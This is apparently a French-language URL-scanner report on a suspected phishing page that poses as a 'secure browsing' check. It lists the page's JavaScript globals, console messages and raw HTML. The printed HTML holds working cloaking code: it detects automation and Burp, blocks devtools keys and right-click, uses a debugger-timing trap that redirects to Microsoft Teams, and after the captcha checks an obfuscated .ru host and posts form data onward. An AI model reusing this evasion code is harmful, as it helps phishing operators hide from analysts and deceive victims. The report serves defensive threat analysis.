https://c75x.pemidone.ru/SAh3syee/

ID de l'analyse :
9a62755f-872b-450a-aa80-535b864fa1c6Terminée
URL soumise :
https://sjmdocument.towardstop.net/
Fin du rapport :

Liens : 0 trouvé(s)

Liens sortants identifiés à partir de la page

Variables JavaScript : 10 trouvée(s)

Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel

NomType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
FaDYmNVCAbobject
$function
jQueryfunction
turnstileobject
CryptoJSobject
hDEupplLmGfunction
gePtyPWiATfunction

Messages de journal de console : 5 trouvé(s)

Messages consignés dans la console web

TypeCatégorieEnregistrement
warningnetwork
URL
https://c75x.pemidone.ru/SAh3syee/
texte
A parser-blocking, cross site (i.e. different eTLD+1) script, https://code.jquery.com/jquery-3.6.0.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://c75x.pemidone.ru/SAh3syee/
texte
A parser-blocking, cross site (i.e. different eTLD+1) script, https://code.jquery.com/jquery-3.6.0.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://c75x.pemidone.ru/SAh3syee/
texte
A parser-blocking, cross site (i.e. different eTLD+1) script, https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
warningnetwork
URL
https://c75x.pemidone.ru/SAh3syee/
texte
A parser-blocking, cross site (i.e. different eTLD+1) script, https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://www.chromestatus.com/feature/5718547946799104 for more details.
errornetwork
URL
https://c75x.pemidone.ru/favicon.ico
texte
Failed to load resource: the server responded with a status of 404 ()

HTML

Le corps HTML de la page en données brutes

<!-- The only limit to our realization of tomorrow will be our doubts of today. --><!-- Success is not built on success. It&#039;s built on failure. It&#039;s built on frustration. Sometimes it&#039;s built on catastrophe. --><html lang="en"><head>


    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="robots" content="noindex, nofollow">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>​</title>
    <style>
body {
  background-color: #fff;
  height: 100%;
  overflow: hidden;
}
#YSKaBjpCxe h4{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2;}
#YSKaBjpCxe h4{font-size:calc(1.3);}
@media (min-width:1200px){
#YSKaBjpCxe h4{font-size:1.5rem;}
}
#YSKaBjpCxe p{margin-top:0;margin-bottom:1rem;}
#YSKaBjpCxe.captcha-container{position: relative;top: 50px;/*width: 100%;*/padding-right: var(--bs-gutter-x, .75rem);padding-left: var(--bs-gutter-x, .75rem);margin-right: auto;margin-left: auto;}
#YSKaBjpCxe .text-center {text-align: center!important;}
@media (min-width:992px){
#YSKaBjpCxe .col-lg-4{flex:0 0 auto;width:33.33333333%;}
}
#YSKaBjpCxe .display-4 {font-size: 1.25rem!important;}
#YSKaBjpCxe .mt-2 {margin-top: 0.5rem!important;}
#YSKaBjpCxe .h4 {font-size: calc(.900rem + .3vw);}
#YSKaBjpCxe .justify-content-center{justify-content:center!important;}
#YSKaBjpCxe.mt-5{margin-top:3rem!important;}
#YSKaBjpCxe .mt-4 {margin-top: 1rem!important;}
#YSKaBjpCxe #jPXMVAhNQk {color: #6c757d;font-size:14px;margin-top: .5rem;}
    </style>
    <script>
    if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
(function HsdzgrSHlA() {
    let IHTkxznISE = false;
    const qSQIVpXFRv = 100;
    setInterval(function() {
        const srSYGklFFX = performance.now();
        debugger;
        const KWFNcMywnK = performance.now();
        if (KWFNcMywnK - srSYGklFFX > qSQIVpXFRv && !IHTkxznISE) {
            IHTkxznISE = true;
            window.location.replace('https://teams.microsoft.com');
        }
    }, 1000);
})();
    </script>
</head>

<body style="font-family: arial, sans-serif;background-color: #fff;color: #000;padding: 20px;font-size: 18px;overscroll-behavior: contain;">
<div id="YSKaBjpCxe" class="captcha-container">
<div id="lwVfuGDggZ" class="justify-content-center">
<div class="text-center">
<form id="fbWzuqrnDF">
<div class="cf_turnstile" id="cf"><div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-n2ycf_response"></div></div>
<input type="hidden" id="sid" name="sid" value="32CXsNlVZbNbE4wGL6Cr40EDVwLdhZVc795keQnk">
<input type="hidden" id="pagelink" name="pagelink" value="">
<input type="hidden" id="bltdip" name="bltdip" value="Unknown">
<input type="hidden" id="bltdref" name="bltdref" value="https://sjmdocument.towardstop.net/">
<input type="hidden" id="bltdua" name="bltdua" value="Unknown">
<input type="hidden" id="bltddata" name="bltddata" value="">
</form>
</div>
<div class="text-center" id="jPXMVAhNQk">
Your browser is being verified for secure browsing.
</div>

</div>
</div>

<script>
turnstile.render('#cf', {
    sitekey: '0x4AAAAAAA0xOGTYrkNzG180',
    'error-callback': hDEupplLmG,
    callback: gePtyPWiAT,
});
function hDEupplLmG() {
    turnstile.reset();
}
function gePtyPWiAT() {
    var AXQpkyMsYP = document.getElementById("fbWzuqrnDF");
    AXQpkyMsYP.onsubmit = function (event) {
        event.preventDefault();
    };
    document.getElementById("pagelink").value = 'RK9BQ';
    var LthqdUDzlN = "../ajT1WdiI7QayyHoa6N781w0YFZ9WOtS002";
    fetch('https://BIQgzwMYvKHOtCxJj5eXqBQkcFVSKYBQ9Lrlxgyqmb0CNlM9e2.ezmbsgzm.ru/ndckiqhnfqfqggpjpynuerluhMJSvHXHRZUUCGBTIODMKFJXPLYWJCCTVGKUFCZHABGCJHTCZITQMJF', {
    method: "GET",
    }).then(response => {
    return response.text()
    }).then(text => {
    if(text == 0){
    fetch(LthqdUDzlN, {
        method: "POST",
        body: new FormData(AXQpkyMsYP)
    }).then(response => {
        return response.json();
    }).then(data => {
        if(data['status'] == 'success'){
        location.reload();
        }
        if(data['status'] == 'error'){
        window.location.replace('https://teams.microsoft.com');
        }
    });
    }
    if(text != 0){
    window.location.replace('https://teams.microsoft.com');
    }
    })
    .catch(error => {
    window.location.replace('https://teams.microsoft.com');
    });
}
</script>





</body></html><!-- Success is not how high you have climbed, but how you make a positive difference to the world. -->